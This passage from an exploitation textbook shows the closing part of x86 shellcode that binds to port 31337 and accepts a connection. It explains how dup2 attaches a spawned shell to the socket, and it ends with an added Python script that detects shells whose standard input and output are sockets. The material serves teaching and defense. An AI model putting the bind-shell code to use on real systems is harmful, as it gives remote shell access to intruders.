push BYTE 16 ; argv: { sizeof(server struct) = 16,
push ecx ; server struct pointer,
push esi ; socket file descriptor }
mov ecx, esp ; ecx = argument array
int 0x80 ; eax = 0 on success
; listen(s, 0)
mov BYTE al, 0x66 ; socketcall (syscall #102)
inc ebx
inc ebx ; ebx = 4 = SYS_LISTEN = listen()
push ebx ; argv: { backlog = 4,
push esi ; socket fd }
mov ecx, esp ; ecx = argument array
int 0x80
; c = accept(s, 0, 0)
mov BYTE al, 0x66 ; socketcall (syscall #102)
inc ebx ; ebx = 5 = SYS_ACCEPT = accept()
push edx ; argv: { socklen = 0,
push edx ; sockaddr ptr = NULL,
push esi ; socket fd }
mov ecx, esp ; ecx = argument array
int 0x80 ; eax = connected socket FD
When assembled and used in an exploit, this shellcode will bind to
port 31337 and wait for an incoming connection, blocking at the accept call.
When a connection is accepted, the new socket file descriptor is put into EAX
at the end of this code. This won't really be useful until it's combined with
the shell-spawning code described earlier. Fortunately, standard file descriptors
make this fusion remarkably simple.
0x541 Duplicating Standard File Descriptors
Standard input, standard output, and standard error are the three standard
file descriptors used by programs to perform standard I/O. Sockets, too, are
just file descriptors that can be read from and written to. By simply swapping
the standard input, output, and error of the spawned shell with the connected
socket file descriptor, the shell will write output and errors to the socket and
read its input from the bytes that the socket received. There is a system call
specifically for duplicating file descriptors, called dup2. This is system call
number 63.
reader@hacking:~/booksrc $ grep dup2 /usr/include/asm-i386/unistd.h
#define __NR_dup2 63
reader@hacking:~/booksrc $ man 2 dup2
DUP(2) Linux Programmer's Manual DUP(2)
NAME
dup, dup2 - duplicate a file descriptor
SYNOPSIS
#include <unistd.h>
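The swap described above leaves a visible trace on a Linux host: the shell's descriptors 0, 1 and 2 all resolve to a socket instead of a terminal or pipe. The following script is an added example, not code from the book; it reads /proc/<pid>/fd link targets (which the kernel renders as "socket:[inode]" for sockets) and flags interactive shells whose stdin and stdout are both socket-backed. The list of shell names is an assumption chosen for illustration.

```python
import os
import re

# Link-target form the Linux kernel uses for socket descriptors in /proc/<pid>/fd/.
_SOCKET_RE = re.compile(r"^socket:\[\d+\]$")


def std_fds_on_socket(fd_targets):
    """Return the set of standard fds (0, 1, 2) whose link target is a socket.

    fd_targets maps fd number -> readlink() result, e.g. {0: "socket:[4711]"}.
    A descriptor missing from the map counts as not-a-socket."""
    return {fd for fd in (0, 1, 2) if _SOCKET_RE.match(fd_targets.get(fd, ""))}


def is_suspicious(fd_targets, comm):
    """A shell whose stdin AND stdout both point at a socket is the fingerprint
    left by the dup2() swap. Other programs legitimately run with socket-backed
    stdio (inetd-style services, sshd children), so the check is limited to
    shells. The shell-name set is an assumption for this example."""
    shells = {"sh", "bash", "dash", "zsh", "ksh"}
    return comm in shells and {0, 1} <= std_fds_on_socket(fd_targets)


def read_proc_fds(pid):
    """Collect link targets of fds 0-2 for one live process (Linux only).
    Returns an empty dict where /proc is unavailable or access is denied."""
    out = {}
    for fd in (0, 1, 2):
        try:
            out[fd] = os.readlink(f"/proc/{pid}/fd/{fd}")
        except OSError:
            pass  # fd closed, process exited, or insufficient privilege
    return out


def scan_processes():
    """Yield (pid, comm) for every process matching is_suspicious()."""
    if not os.path.isdir("/proc"):
        return
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/comm") as fh:
                comm = fh.read().strip()
        except OSError:
            continue
        if is_suspicious(read_proc_fds(int(entry)), comm):
            yield int(entry), comm


if __name__ == "__main__":
    for pid, comm in scan_processes():
        print(f"pid {pid} ({comm}): stdin/stdout attached to a socket")
```

Run it as root to see every process; unprivileged runs silently skip processes whose /proc entries are not readable.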